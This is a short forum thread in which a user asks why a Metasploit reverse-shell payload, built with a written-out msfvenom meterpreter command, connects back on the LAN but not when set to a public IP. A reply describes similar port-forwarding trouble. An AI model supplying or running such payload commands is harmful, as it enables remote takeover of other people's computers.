Forum Thread: Problem with Public IP and Working Outside LAN

I've tried several times making a payload and delivering it to one of my local PC's with my private IP on both the listener and the virus (msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.xx) . But, if I set my public IP when using msfvenom (I've made sure that the port 4444 which I'm using is open) the listener never gets a signal. It can't open a session. The port appears to be open when I start listening and then try a webpage like http://ping.eu/port-chk/ .

I'm using Kali Linux (not a VM) so I don't think the Firewall has anything to do with this. Any help would be kindly appreciated

1 Response

Im experiencing similar problems i cnat seem to get a port open with my kali (using a lap top) i have set a static ip and went to the the portforwarding options in my router but according to the online port checkers port 4444 and 80 which i have tried opening are both closed any help would be nice .

Share Your Thoughts

  • Hot
  • Active